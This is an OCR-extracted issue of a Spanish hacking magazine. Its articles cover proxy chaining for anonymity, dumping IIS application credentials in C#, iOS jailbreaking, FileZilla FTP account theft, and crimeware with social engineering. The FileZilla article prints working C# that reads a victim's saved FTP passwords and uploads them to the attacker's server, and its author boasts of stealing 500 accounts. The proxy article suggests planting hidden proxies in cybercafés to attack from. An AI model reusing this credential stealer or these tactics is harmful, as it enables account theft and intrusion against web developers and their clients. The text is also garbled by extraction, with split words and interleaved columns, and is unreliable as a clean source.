xD, que recuerdos. Ahora si como dice el 
dicho “el diablo sabe más por viejo que por 
diablo” con esta moraleja quiero prevenir 
a todos nuestros lectores y lo pondré entre 
comillas que “tengan en la mente que nun-
ca de los nunca ocultaremos nuestra IP al 
100%” y que siempre habrá forma de ras-
trearte y localizarte.
CONEXIÓNES POR
DEFAULT A INTERNET
Normalmente una conexión a internet 
la hacemos de nuestra computadora a un 
router el cual sirve como puerta de enlace 
hacia los servicios que nos conectemos, en 
este caso Internet, donde el usuario tiene 
una IP interna, la cual es asignada por el 
protocolo DHCP, y que por default en la 
mayoría de los casos está estructurada en 
el rango 192.168.1.XX donde las XX se-
rian números asignados del 1 al 254, una 
vez asignada el router se conecta con el ISP 
“Internet Service Provider” con el cual te-
nemos contratado el servicio de Internet y 
este nos asigna una IP que en nuestro caso 
en servicios caseros sería una IP Dinámica 
Publica y con esta podremos navegar en 
internet además es la que nos identificará 
y quedará registrada en los logs de todos 
los lugares que visitemos, esta IP es como 
nuestra huella digital que queda plasmada 
en todo lo que tocamos, ahí está el punto y 
Por Rodolfo H.Baz aKa Pr@fEsOr X
NAVEGACIÓN 
ANÓNIMA
OCULTANDO 
NUESTRAS HUELLAS
E N I N T E R N E T
www.hackingmexico.mx 17
n
a
v
e
g
a
c
i
ó
n
 
a
n
ó
n
i
m
a
www.hackingmexico.mx16
navegación anónima
Como pueden ver este tipo de 
conexión necesita de más recursos, 
y se asemeja mucho a lo que vemos 
en las películas de gangter´s infor-
máticos donde tratan de rastrear al 
delincuente informático y se dan 
cuenta que la conexión pasa por va-
rios países o cambio de localización, 
aquí lógicamente se las muestro en 
su forma real y sin tanto efecto es-
pecial de Hollywood pero realmente 
esta si es efectiva, el único problema 
que le veo es que como se genera 
una conexión con varios servidores 
tendríamos que tener proxy rápidos 
para poder llevar a cabo esta técnica, 
como les decía a mis alumnos de 
la certificación de hacking ético 
que doy, ---los delincuentes van 
un paso delante de nosotros y un 
experto en seguridad informática 
debe de pensar como ellos para así 
no quedarse atrás y poder aplicar 
seguridad ofensiva en el momento 
oportuno, tomando en cuenta esto, 
yo lo que haría es instalar un proxy 
server oculto en un cibercafé en una 
ciudad, otro en una universidad en 
una ciudad diferente y así hacerlo en 
dos o tres lugares más donde se que 
la conexión es estable y rápida, con 
eso garantizaría la conexión para 
atacar---.
Pero muchos se preguntaran a 
estas alturas con que utilería po-
dría hacer esto? Bueno pues muy 
fácil, existe una utilería llamada 
SocksChain que es un programa 
que permite trabajar con cualquier 
servicio a través de una cadena de 
Sockets o proxy server HTTP para 
ocultar la IP real, este puede traba-
jar con TELNET, IRC etc.
PRINCIPIOS DE 
OPERACIÓN
DE SOCKSCHAIN SERVER
SocksChain transmite la llamada 
TCP del programa cliente (Fire-
fox) a través de una cadena de 
proxy servers, Sockschain solo 
se conecta el primer proxy server 
de la cadena y el primer proxy 
server a su vez manda la petición 
de conexión al segundo y así hasta 
llegar al final de la cadena confi-
gurada, usando esta tipo de cone-
xión donde el primero llamada al 
segundo y el segundo al tercero y 
el tercero al siguiente en la cadena, 
el rastreo de la conexión inicial 
es muy compleja, esto no quiere 
decir que sea imposible de rastrear 
ya que se podría seguir el orden 
inverso de la conexión analizando 
los logs de los servers conectados, 
pero surge una pregunta ¿si alguno 
de los servidores de la cadena no 
guardo los logs? Pues hasta ahí 
llego el rastreo ;), teóricamente 
este tipo de conexión provee un 
alto grado de anonimato, me atre-
vería a decir que el grado de ano-
nimato sería de un 70% y podría 
aumentar el % si lo combinamos 
con otras técnicas pero tengan en 
cuenta que el largo de la cadena 
es inversamente proporcional a la 
velocidad de conexión.
PROXY CHAIN SERVER
OK continuemos como decía Raúl 
Velasco “AUN HAY MAS”, que quie-
ro decir con esto, todavía podemos 
hacer mas anónima nuestra navega-
ción, por medio de una técnica llamada 
“pROXYchAIN” con la cual nos co-
nectaríamos a mas de 1 servidor Proxy, 
por ejemplo nuestra conexión verdadera 
esta en México pero nos conectamos a un Proxy que 
está en China y luego a uno en Afganistán y después a 
otro que está en Inglaterra y por último uno que este en 
Finlandia y aparte de esto todos los servidores son HIgh 
Anonymity, hehehe que creen que pase?, pues están en 
lo cierto seria una tarea descomunal y una gran cantidad 
de recursos se necesitarían para poder rastrear el origen 
de la conexión, en el siguiente esquema planteo la 
conexión por medio de Proxy Chain Server´s:
En concreto lo que debe-
mos hacer para utilizar un 
servidor Proxy Web es primero 
conseguir un Proxy (número y 
puerto). Podemos sacar uno de esta 
página: http://www.publicproxyser-
vers.com/
Una vez que consigamos el Proxy 
y nos aseguremos que sea bueno, que 
significa cuando digo que sea bueno?, 
como podrán ver en la link que les di 
encontrarán algo como esto:(imagen)
IP. Es la IP con la que nos camuflajea-
remos y la que verán todas las paginas 
que visitaremos, van entendiendo? ;P
Puerto. Canal de comunicación por 
donde mandaremos y recibiremos la 
información.
Type. Creo que es la más importante 
ya que siempre deberemos escoger los 
que tengan el tipo de “HIgh Anonymi-
ty” ya que estos no guardan Logs de 
las computadoras que se conectan a 
ellos y así si nos quieren rastrear 
pues será súper pero súper 
difícil que nos localicen.
Una vez que escogimos un 
buen servidor Proxy tenemos 
que decirle a nuestro equipo que 
se conecte a través de él, para eso 
vamos a ir (usando FIREFOX) a He-
rramientas > opciones > avanzado > red 
> Configurar como se conecta Firefox y 
después escribimos nuestro Proxy en las 
casillas de abajo (dirección por un lado 
y puerto por otro) y seleccionamos la 
casilla “usar el mismo proxy para todo” 
en el caso que vayas a usar el proxy para 
conectarte a un ftp o una conexión SSL
Bien con eso ya tenemos nuestro equipo configurado para navegar con 
un servidor Proxy y ocultos detrás de este, por lo tanto como quedo la co-
nexión la plasmaremos en el esquema siguiente: (imagen)
OK! Recuerden por favor que este es el más sencillo de los métodos y ten-
dríamos que verificar si realmente está ocultando nuestra identidad, pero la 
técnica de verificación de identidad la dejaremos para el final del artículo.
IP Port Type Country Last Test
203.160.1.54 80 transparent Vietnam 2012-01-18
200.174.85.193 3128 transparent Brazil 2012-01-18
165.228.131.12 80 transparent Australia 2012-01-18
203.144.144.164 80 transparent Thailand 2012-01-18
62.65.159.183 3128 transparent Switzerland 2012-01-18
63.149.98.18 80 anonymity United States 2012-01-18
www.hackingmexico.mx 19
n
a
v
e
g
a
c
i
ó
n
 
a
n
ó
n
i
m
awww.hackingmexico.mx18
navegación anónima
ya no explicare esto aquí ya que en 
el apartado de configuración manual 
ahí lo explico cómo hacerlo, solo diré 
que como Proxy Server deberán poner 
127.0.0.1 por el puerto 1080 guardas 
los cambios y ahora si a probar la cone-
xión arrancamos el explorador de Inter-
net y verán como en el sockschain aparece 
el encadenamiento que se está haciendo en la 
siguiente ventana un ejemplo:
Con esto nos podemos dar cuenta que funciona 
perfectamente el encadenamiento, en próximas 
ediciones de la revista veremos las demás téc-
nicas que faltan por analizar.
Saludos.
Una vez actualizada y 
testeados todos los Proxy ser-
vers aparecerá algo como en la 
siguiente ventana: (imagen)
Aquí como pueden ver ustedes apa-
recen unos servidores con un foquito 
y otros con un icono circulo Rojo con 
una X blanca eso quiere decir que los 
segundos no están en funcionamiento 
entonces Tendremos que borrarlos se-
leccionándolos y dando clic en el botón 
DELETE ya que están en la lista solo 
los que funcionaran, cerramos la ven-
tana y ahora si a empezar la confi-
gurar el sockschain.
Ahora configuremos nues-
tra cadena de servidor Proxy a 
los cuales nos conectáremos para 
ocultar Nuestra IP, para eso damos 
clic en la ventana principal del progra-
ma en el signo de + de color verde, don-
de saldrá la siguiente ventana: 
Una vez estando ahí en la ventana de creación de la candena, vamos a con-
figurar primeramente en la opción llamada NAME le ponemos el nombre 
con el cual identificaremos a nuestra cadena de conexión después vamos a la 
opción donde pondremos la cantidad de Proxy`s servers a los que nos conectáre-
mos en este caso haremos una conexión a TRES servidores.
Punto seguido vamos ahora si a añadir las ip de los servidores a los cuales nos 
conectaremos como se muestra en la imagen de arriba, ya seleccionados damos clic 
en el botón OK y listo programa configurado, ahora si viene la prueba de fuego de-
beremos configurar nuestro explorador de Internet manualmente para que se conecte, 
CONFIGURACIÓN
DEL SOCKSCHAIN 
Ahora veremos un software 
que también tiene lo suyo, este 
sirve para hacer manualmente 
un Proxychain, o sea un 
encadenamiento de varios Proxy`s 
para así tener relativamente un 
buen anonimato en la red.
Como dice mi hijo 
“papa menos platica y 
mas acción” hehehe, ok la 
versión que instalaremos será 
SOCKSCHAIN v 3.11.151 
mucha gente dice que este 
software ya no funciona y 
realmente en el sentido estricto 
tienen razón ya que la lista de 
Proxy`s servers que trae por 
default está obsoleta, pero 
aquí no usaremos esa lista si 
no que vamos a crear nuestra 
propia lista de servidores que 
obtendremos de la pagina 
mencionada en el apartado 
CONFIGURACION DE 
UTILERIAS.
Primeramente instalaremos 
el sockschain como todo en 
windows siguiente .. siguiente… 
hasta finalizar la instalación, un 
vez ahí abrimos el programa y nos 
aparecerá la siguiente ventana: 
En la cual podemos ver 
diferentes iconos, ahora damos 
clic en el icono que tiene 
como dos calcetines 
colgados y aparece 
la siguiente ventana 
la cual nos muestra 
una lista de servidores 
Proxy a los cuales nos 
podríamos conectar, una vez 
ahí le damos click en UPDATE 
LIST la cual bajara la nueva lista 
de servidores Proxy que están 
disponibles para su uso le damos 
clic y esperamos que actualice, 
una vez realizada, le damos clic 
en el botón llamado TEST ALL 
esto para que pruebe si los Proxy 
servers están disponibles para su 
uso y conectados. 
www.hackingmexico.mx 21
n
a
v
e
g
a
c
i
ó
n
 
a
n
ó
n
i
m
a
www.hackingmexico.mx20
navegación anónima
El código es tan sencillo como el siguiente
ServerManager man=new ServerManager(); 
 Console.Clear();
 foreach (var site in man.Sites)
 {
 foreach (var app in site.Applications.ToList())
 {
 foreach (var directory in app.VirtualDirectories)
 { 
 Console.WriteLine(“Sitio {0} App {1} 
UserName:{2},Password:{3}”, site.Name, directory.Path,directory.
UserName,directory.Password); 
 }
 }
 }
 Console.ReadLine(); 
C#
En este articulo vamos a demostrar que con Microsoft también es po-sible realizar hacking utilizando código relativamente sencillo. El objetivo es obtener el usuario y 
el password con el cual está corriendo y au-
tenticándose una aplicación en el servidor web 
(IIS), tomaremos como talon de Aquiles para 
este servidor el actual esquema de negocio que 
se maneja para hostear aplicaciones en servido-
res compartidos.
La estrategia para alcanzar el objetivo es 
consultar todas las aplicaciones en el IIS, nave-
gar atravez de sus aplicaciones y como es buena 
práctica en las aplicaciones web, las cadenas de 
conexión utilizan integrate security, que signifi-
ca esto? Que utilizamos una cuenta de dominio 
para poder firmarnos en el servidor SQL, con lo 
cual el password nunca aparecerá en el archivo 
de configuración. 
La aplicación navegara atreves de todas 
las aplicaciones web y nos arrojara el nombre 
de usuario y la contraseña de todas las apli-
caciones hosteadas en ese server y con esto 
tendremos acceso tanto a la base de datos como 
a cualquier cuenta que tengan privilegios.
Debug en el IdeSalida Consola
p
o
r
 M
a
r
io
 A
lb
er
to
 G
o
n
z
a
les
 a
k
a
 A
x
x
u
sMicrosoft
Hacking
www.hackingmexico.mx 23
h
a
c
k
i
n
g
 
m
i
c
r
o
s
o
f
t
 
c
#
www.hackingmexico.mx22
hacking microsoft c#
ALGUNOS BENEFICIOS DE UN 
DISPOSITIVO IOS CON Y SIN 
JAILBREAK
Al Hacer el jailbreak obtendremos beneficios 
que no podemos tener con un dispositivo por 
llamarlo de alguna manera “normal”.
A continuación detallare los beneficios 
que su servidor ha usado en sus dispositivos:
Como pueden ver amigos los be-
neficios son bastantes buenos , pero la 
lista no termina ahí, son demasiados los 
que podemos obtener, los cuales iremos 
aprendiendo a instalar y usar .
CARACTERÍSTICAS PARA 
OBTENER BENEFICIOS DEL 
JAILBREAK
¿Como instalo dicho software para tener 
esos beneficios?
La respuesta es muy simple, tenemos 
que realizar el jailbreak al sistema IOS 
del dispositivo.
¿Mi dispositivo de Apple es apto para 
Tener jailbreak?
Si pero debe cumplir ciertos requi-
sitos, antes de hacer un jailbreak es im-
portante leer y saber que vamos a hacer 
exactamente.
Para poder hacer jailbreak a nuestro 
dispositivo es importante sabe que no 
hay un jailbreak en general para todos los 
productos Apple , esto varia según :
-Generación del Dispositivo
-Versión de Firmware
-Modelo del dispositivo.
¿Mi dispositivo pierde garantía frente 
a APPLE si le hago jailbreak?
La respuesta es NO , por que? , por 
que no modificamos el hardware , pero 
si modificamos el software, un ejemplo 
muy claro seria , supongamos que mi 
IPHONE tiene jailbreak y esta liberado, 
trabaja bien en pocas palabras , pero….. 
falla la red 3G y tengo contratado un 
plan de datos con la operadora X, como 
le hago para llevarlo a la empresa X y 
que me hagan valida la garantía (obvio 
tuve que haber descartado previamente , 
ajustes de servicios 3G o que alguna apli-
cación interfiera con la conexión del telé-
fono hacia la operadora) , Si bien se sabe 
si llevas un dispositivo a que te valide la 
garantía y tiene jailbreak la garantía se 
anula , pero si restauramos un firmware 
limpio se borra todo y procedemos a re-
clamar la garantía.
Hack intosh
Por Juan Angel Osorio M4ku4z
M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net
Al hacer 
jailbreak, no 
significa que 
tendremos 
liberado el 
teléfono, 
eso es otro 
proceso que 
veremos 
mucho mas 
adelante.
DESPÉDIDA
Bueno amigos , hemos llegado a la recta final de esta sección , donde aprendimos a co-
nocer todo el potencial que podríamos tener si hacemos jailbreak a nuestros dispositivos 
, además de conocer algunas preguntas que se hacen muchos cuando van empezando en 
esto del jailbreak . Pormi parte es todo , sin antes agradecer su atención y nos vemos 
pronto en otro capitulo más.
S aludos amigos mios, soy M4ku4Z^^ y es un placer formar parte de este proyec-to tan interesante al cual fui 
aceptado por el buen Megabyte, algunos ya 
me conocen otros no tanto , espero poder 
contribuir con este proyecto y al igual si 
tienen dudas ya saben como contactarme .
Vamos a analizar el jailbreak a disposi-
tivos iOS de Apple , revisar por que si o por 
que no debemos hacer el jailbreak, también 
averiguaremos si nuestros dispositivos son 
candidatos o aptos para hacerlo.
Actualmente se pueden hacer jail-
break a los siguientes dispositivos de 
Apple como los con :
-Ipod touch de 1 generación
-Ipod touch de 2 generación
-Ipod touch de 3 generación
-Ipod touch de 4generacion
-Iphone classic (1 generación)
-Iphone de3 Generación
-Iphone de 4 Generación
-Ipad de 1 generación
-Apple tv de 2 generación.
Tomado de Wikipedia
Jailbreak: (en español, escaparse de la 
cárcel o, más literalmente, rompecárcel), 
un proceso que permite a los usuarios de 
los dispositivos iPhone, iPod Touch, iPad 
y Apple TV de todas las generaciones eje-
cutar aplicaciones distintas a las alojadas 
en App Store, el sitio oficial de descarga 
de programas para estos dispositivos.
En mis palabras, seria como sacar 
todo el provecho máximo de los disposi-
tivos que Apple nos vende.
Hasta la Fecha he logrado hacer jail-
break a ipods touchs, iphones, ipads y 
Apple tv 2G.
No es ilegal hacer el jailbreak a nin-
gún dispositivo , pero lo que es ilegal 
es instalar aplicaciones de la APP STO-
RE crackeadas, eso lo conseguimos con 
“APPSYNC” (pronto veremos su funcio-
namiento).
He de comentarles que el proceso de 
jailbreak es diferente según el IOS (ver-
sión de software instalado en el idevice) 
.El firmware mas acual es el IOS 5.1 , yo 
aun no lo he instalado en ninguno de mis 
dispositivos , pero mas adelante, en el 
siguiente tutorial haremos una pequeña 
reseña de que es lo nuevo en ese IOS.
Al Hacer Jailbreak al dispositivo obte-
nemos bastantes mejoras en el desempeño 
del idevice , un ejemplo y el 
mas aclamado lo vemos en 
el iphone de cualquier gene-
ración la cual es la liberación 
del carrier o de las bandas , esto nos quiere 
decir que podemos usar el iphone con la 
operadora que mas nos convenga , ya sea 
por precio , cobertura , por preferencia , o 
simplemente por decidir tener el iphone li-
bre . Aquí hay dos cosas muy importantes: 
Al hacer jailbreak, no significa que tendre-
mos liberado el teléfono, eso es otro proce-
so que veremos mucho mas adelante.
 jailbreak en d ispositivos IOS
Definición de Jailbreak
www.hackingmexico.mx 25
h
a
c
k
i
n
t
o
s
h
www.hackingmexico.mx24
hackintosh
Vulnerabilidades
en FileZilla
Al principio mencione acerca de que FileZilla 
tiene vulnerabilidades, son 2 vulnerabilidades 
que mas que vulnerabilidades de programa-
ción son vulnerabilidades de logística la pri-
mera es el guardado automático de las cuen-
tas FTP, si tú te entras a un servidor con FTP 
con FileZilla el automáticamente las guarda 
en su registro, ni si quiera te pregunta es una 
opción marcada por defecto, la segunda y 
más importante así como estúpida es la mane-
ra en que almacena sus contraseñas, FileZilla 
no almacena las contraseñas como lo hace el 
MSN u otros programas que con las mismas 
dlls del sistema encriptan las cuentas, FileZi-
lla las almacena en un XML en texto plano en 
el siguiente formato:
Robo de cuentas
FTP
<?xml version=”1.0” encoding=”UTF-8” standalone=”yes” ?>
<FileZilla3>
 <RecentServers>
 <Server>
 <Host>CorruptedByte.net</Host>
 <Port>21</Port>
 <Protocol>0</Protocol>
 <Type>0</Type>
 <User>CorruptedByte</User>
 <Pass>MiContra</Pass>
 <Logontype>1</Logontype>
 <TimezoneOffset>0</TimezoneOffset>
 <PasvMode>MODE_DEFAULT</PasvMode>
 <MaximumMultipleConnections>0</MaximumMultipleConnections>
 <EncodingType>Auto</EncodingType>
 <BypassProxy>0</BypassProxy>
 </Server>
 </RecentServers>
</FileZilla3>
Como pueden ver esta guardado en texto plano sin ningún tipo de encriptación a simple 
vista puedes ver como tienes los sub nodos con las credenciales FTP (Host, Port, User, 
Pass), esto es una gran vulnerabilidad ya que como lo mencione es de los clientes FTP 
más usado por los desarrolladores web que manejan diferentes servidores, este archivo 
se encuentra en la siguiente ruta:
“C:\Users\CorruptedByte\AppData\Roaming\FileZilla\recentservers.xml”
Hola mi nickname es Corrup-tedByte y en esta ocasión abordaremos el tema de la 
cuentas FTP y las vulnerabilidades con 
las que cuenta FileZilla el cliente FTP 
más usado por muchas razones, además 
les dejare el código fuente de un pequeño 
script que desarrolle en C# .NET para el 
robo de cuentas FTP del cliente FileZilla.
¿Qué es FTP?
FTP o como en ingles se dice File Trans-
fer Protocol, ‘Protocolo de Transferencia 
de Archivos’ es un protocolo de red para 
la transferencia de archivos entre siste-
mas conectados a una red basado en la 
arquitectura cliente-servidor. Es muy 
sencillo de entender, del lado del cliente 
(Tu, tu computadora) manda una peti-
ción al servidor para descargar o enviar 
un fichero y el servidor responde con ese 
fichero, a grandes rasgos eso es lo que es 
FTP aunque cuenta con un proceso más 
complejo, pero eso lo pueden estudiar 
más a fondo en nuestro señor Wikipedia, 
o lo pueden Googlear. Este protocolo 
se utiliza por lo regular para entrar a un 
servidor web y subir páginas web, por lo 
cual teniendo la cuenta FTP de la página 
de peña nieto por ejemplo, pues entras, le 
borras la pagina y subes una tuya nomas 
para darle en la madre.|
Robo de
cuentas FTP
Hay muchas maneras de robar cuen-
tas FTP como infección por troyanos, 
keyloggers, sniffing, penetración me-
diante vulnerabilidades de tu sistema 
operativo ya sea con Metasploit o a 
mano e incluso XSS, entre otras, pero 
aquí para que no anden de juackers adi-
vinando contraseñas, o haciendo fuerza 
bruta como el megabyte (just kidding), 
les voy a mostrar las vulnerabilidades 
con las que cuenta el cliente FTP Fi-
lezilla que es el más utilizado por los 
desarrolladores web y como explotar 
esas vulnerabilidades programando un 
script, el día que libere el script con di-
ferentes métodos de spreading obtuve 
500 cuentas FTP en un solo día ya que 
muchos freelancers usan este cliente 
para administrar las diferentes páginas 
web de sus clientes, entonces una sola 
persona puede tener hasta 30 cuentas 
FTP guardadas de sus clientes.
www.hackingmexico.mx 27
r
o
b
o
 
d
e
 
c
u
e
n
t
a
s
 
F
T
P
www.hackingmexico.mx26
robo de cuentas FTP
Es un método muy simple (claro para los que sabemos pro-
gramar, si no sabes pues hay esta nuestro señor Google), a 
simple vista se ve que lo único que hace este método es crear 
un objeto XML para trabajar con el asi como se le da la ruta de 
manera automática con esta línea:
.NET nos facilita la ruta y así nos quitamos el problema que nos 
topamos con que el fichero XML este dentro de una carpeta den-
tro de otra carpeta con el nombre de usuario de la maquina que 
obviamente desconocemos. Después se procesa todo el XML y 
se saca el valor de cada nodo que tiene las credenciales FTP, una 
vez haciendo esto solo se guarda en un archivo de texto, pero ob-
viamente con esto nosotros no tendríamos las credenciales FTP 
solo se almacenarían en un archivo de texto de la víctima, para 
eso ahora programaremos un método para enviar las contraseñas 
por medio de FTP a nuestro servidor, de la siguiente manera:
Con este método nada mas le pasamos nuestras credenciales 
FTP para mandar el fichero con las contraseñas y ya en el mé-
todo principal solo llamamos a los métodos que programa-
mos anteriormente, la otra manera de hacerlo más simple es 
mandando directamente el fichero XML por FTP pero cuando 
lo programeestaba programando un sistema de facturación 
electrónica y estaba practicando con los objetos XML, a este 
código le falta mucho yo solo les di el método principal que 
es como extraer las contraseñas pero el malware completo que 
desarrolle tiene métodos de spreading, ofuscación, ejecución 
durante el arranque, entre otros así como métodos para el robo 
de cuentas guardadas en chrome, firefox, internet explorer, 
MSN y otros clientes FTP menos usados. Si el megabyte no se 
rockstarea cuando se haga popular la revista y me deja escribir 
para la revista, seguiré compartiendo muchos otros métodos 
para escritura de malware ya un poco más avanzados entre 
otras cosas interesantes. 
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
“\\FileZilla\\recentservers.xml”;
public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
 {
 string ftpHostDirFile = “ftp://” + sHost +sDir +sFile;
 FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.
Create(ftpHostDirFile);
 ftp.Credentials = new NetworkCredential(sUser, sPass);
 ftp.KeepAlive = true;
 ftp.UseBinary = true;
 ftp.Method = WebRequestMethods.Ftp.UploadFile;
 FileStream fs = File.OpenRead(sFile);
 byte[] buffer = new byte[fs.Length];
 fs.Read(buffer, 0, buffer.Length);
 fs.Close();
 Stream ftpstream = ftp.GetRequestStream();
 ftpstream.Write(buffer, 0, buffer.Length);
 ftpstream.Close();
 }
public void FileZillaAccounts(string sLogsPath)
 {
 XmlDocument xmlAccountsFile = new XmlDocument();
 string sFilePath =
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + 
“\\FileZilla\\recentservers.xml”;
 xmlAccountsFile.Load(sFilePath);
 xmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName(“
RecentServers”);
 xmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).
GetElementsByTagName(“Server”);
string sAccount;
foreach (XmlElement nodo in xmlList)
 {
 XmlNodeList xmlHost = nodo.GetElementsByTagName(“Host”);
 XmlNodeList xmlPort = nodo.GetElementsByTagName(“Port”);
 XmlNodeList xmlUser = nodo.GetElementsByTagName(“User”);
 XmlNodeList xmlPass = nodo.GetElementsByTagName(“Pass”);
 sAccount = string.Format(“Host: {0} Port: {1} User: {2} Pass: {3}”, 
xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].
InnerText);
 FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate, 
FileAccess.Write);
 fsLogs.Close();
 StreamWriter swAccount = File.AppendText(sLogsPath);
 swAccount.WriteLine(sAccount);
 swAccount.Close();
 }
}
Desarrollemos
el script
Ahora les mostrare como programar un 
script para robar las cuentas FTP de Fi-
leZilla, esto lo hare en C# por que es donde 
programe todo un malware para robo de 
básicamente cualquier tipo de cuentas.
Primero que nada lo que vamos a 
programar será un método para sacar las 
cuentas del FileZilla y guardárnoslas en 
un archivo de texto y esto se hace de la 
siguiente manera:
www.hackingmexico.mx 29
r
o
b
o
 
d
e
 
c
u
e
n
t
a
s
 
F
T
P
www.hackingmexico.mx28
robo de cuentas FTP
El robo de identidad mediante el crimeware, actualmente es uno de los nego-
cios mas lucrativos para los delincuentes informáticos, en la actualidad obtienen 
ganancias muy importantes, pero ¿Porqué es esto tan lucrativo?
 Bueno como sabemos para los delincuentes informáticos este tipo de actividades 
requieren de una inversión mínima y máximas ganancias, estamos hablando de in-
vertir y generar un 99.09 % de ganancias, y con un mínimo de esfuerzo.Así es el por 
que el crimeware ha crecido demasiado en los últimos años.
¿Qué es el crimeware y como funciona?
Se le da el nombre de crimeware a aquel software diseñado para el robo de cuentas o 
robo de identidad del afectado, siendo usadas para obtener beneficios económicos alta-
mente redituantes, este nombre se le da a keyloggers, backdoors, trojanos, entre otros, la 
mayoría de este tipo se software es encontrado con el modo de una botnet, las funciones 
de este tipo de software dañino son muchas, desde controlar nuestro ordenador, ver lo que 
estamos realizando, tener acceso a el de manera remota y oculta ya que esto le permite al 
atacante obtener la información deseada y mantener el control sobre cada una de las perso-
nas infectadas por dicho software “botnet” si es su caso.
Ingeniería social
Hay varias maneras de adquirir estos tipos de infecciones en la red, una de ellas es la ingeniería social.
Por lo regular el atacante maneja la ingeniería social a su favor invitando a los “objetivos” a entrar a 
ver un anuncio, ya sean videos, fotos, etc. 
Ya que las personas tenemos un defecto muy grande el cual se le llama curiosidad. Y por el simple 
morbo de ver que sucede o que contiene ese correo aceptamos sin ni siquiera saber quien es el que 
envía el correo o si esta verificado y así podemos ser una victima, otra de ellas es mediante el traspaso 
de archivos de personas extrañas que se hacen pasar por amigos para solamente robarte tu información 
como estas hay muchísimas otras que por curiosidad acepten el contenido y queden vulnerables a perder 
su información confidencial .
Ingeniería social
En el caso de las empresas el falló estaría en los empleados, que a veces por falta de capacitación 
cometen estos errores.
Un caso seria la dependencia de soporte técnico o de ayuda del personal de servicios informáti-
cos y podría pasar esto:
Simulación de ingeniería social
interactuando con la persona
Riiiiiiing riiiiiiiing (sonido telefonico)
Asistente ejecutiva: Bueno?
Chico malo: Que tal Amy buenas tardes soy de soporte técnico, oye mira me informaron 
que tu equipo esta demasiado lento y quiero corroborar a que se debe.
Asistente ejecutiva: Hay que bueno, si mira es que se me pone muy
lenta la máquina y no puedo trabajar bien.
Chico malo: Ok, mira tienes un icono de asistencia remota en tu escritorio, ábrelo y 
me podrías proporcionar tu usuario y contraseña para entrar a tu equipo así revisarlo 
de manera remota?
Asistente ejecutiva: Claro que si, mi usuario es ***** y mi contraseña *******
Introducción
Por: Arturo Zamora
@zeux0r
zeux0r@insecure.org.mx
mediante 
Robo
Identidad
Crimeware
de
www.hackingmexico.mx 31
r
o
b
o
 
d
e
 
i
d
e
n
t
i
d
a
d
 
m
e
d
i
a
n
t
e
 
c
r
i
m
e
w
a
r
e
robo de identidad mediante crimeware
www.hackingmexico.mx30
¿Porqué lo estaría apoyando?
Los lugares mas comunes de infección son escuelas, parques, cibercafés o simple-
mente lugares públicos del cual mas de uno tenga acceso.
Recolección de información
La recolección de información por parte del atacante la hace mediante bases de 
datos o enviándola via correo electrónico.
Unos ejemplos de ello son Botnets, almacenamiento mediante base de datos 
via web. Tu identidad fue robada cuando has sido victima de robo de identidad 
ya hay poco que puedas hacer, ya que tu nombre, domicilio entre otras cosas 
han sido comprometidos; también “a veces” se tuvieron perdidas económicas 
en compras que no fueron autorizadas por la persona propietaria “real” de las 
cuentas o simplemente extrajeron el dinero sin autorización consiente del usuario.
Protección
Los métodos para protegernos son muchos , y también muchos softwares que 
nos ayudan a esto.
Lo que tendríamos mas en cuenta es controlar un poco mas la curiosidad, 
antes de abrir un correo ver si la persona en verdad es quien dice ser, si no te-
nemos ese nombre en nuestras listas no abrirlo, evitar abrir archivos adjuntos, 
no seguir links que nos lleven a otros sitios fuera del correo, no abrir los correos 
de bandeja spam, si es que no los conocemos, y si los conocemos verificar que 
sea el que lo envía, mantener nuestro antivirus actualizado y verificar unaves 
a la semana que nuestro sistema este libre de amenazas, tener un scanner de 
malware y que nos avise de sitios potencialmente peligrosos, verificar que no 
tengamos procesos raros ejecutándose en nuestro sistema.
Ya si tienes mas paranoia , verificar todas las conexiones que hacemos y a donde 
las hacemos, ver nuestro archivo host en caso que estemos usando Windows, y 
…. Naa creo que esas son todas. ¿FIN?
Simulación de ingeniería social interactuando con la persona.
Aquí el atacante estudio perfectamente su objetivo, sabía a que hora llamar y por 
parte de la asistente vemos que no pide ni siquiera un nombre, ni departamento, 
podría haber llamado primero al superviso o simplemente no haber dado informa-
ción sin antes revisar si hay un ticket abierto y que numero es. Así es como muchas 
empresas pierden millones hoy en día ya que los usuarios están malcapacitados y 
no tienen información de los daños que este tipo de ataques pueden causar
Ataque silencioso
 Crimeware no viene solo, por lo regular tiene también ayuda de otras vulnera-
bilidades, estas vulnerabilidades se encargan de ayudar al software malicioso a 
infectar a los equipos vulnerables.
¿Porqué le doy el nombre de ataque silencioso?
Ya hace tiempo existen scripts llamados exploit packs que se encargan de ex-
plotar varias vulnerabilidades en sistemas por lo regular estos se aprovechan de 
la ejecución remota en navegadores u otros complementos como lo son Word, 
Excel, power point, java, reproductores de video y música. Este error
hace que el usuario al aceptar, entrar o abrir un sitio quede automáticamente in-
fectado y sea una victima mas de este software. Con la ayuda de los exploit packs 
el software se encontrara incrustado en el código fuente del sitio como un frame 
abriendo otro sitio o como un applet o ventana emergente tratando de hacer que 
lo veamos casi obligatoriamente
Alerta sistema Infectado
Cuando el sistema ha sido infectado, aparte de estar perdiendo información confidencial, 
también en algunos casos se perderían cantidades monetarias del usuario “victima” de 
sus cuentas bancarias, tarjetas de crédito, pero eso no seria todo, si no también el usuario 
“victima” estaría perdiendo su identidad ya que el atacante puede usar sus recursos para 
su beneficio y apoyando a la infección y distribución de este crimeware.
¿Porqué lo estaría apoyando?
Al hablar de estar apoyando a la distribución e infección del crimeware no se trata 
de que el usuario “victima” este de acuerdo con el atacante para esto, si no que 
de manera inconsciente la victima puede introducir artículos de almacenamiento 
masivo y llevarlo a otros equipos de infectándolos estos si no se encuentran pro-
tegidos automáticamente como nos muestra la imagen
r
o
b
o
 
d
e
 
i
d
e
n
t
i
d
a
d
 
m
e
d
i
a
n
t
e
 
c
r
i
m
e
w
a
r
e
www.hackingmexico.mx 33www.hackingmexico.mx32
robo de identidad mediante crimeware
El corazón del funcionamiento básico de 
internet radica en el Protocolo de Inter-
net mejor conocido como protocolo IP, 
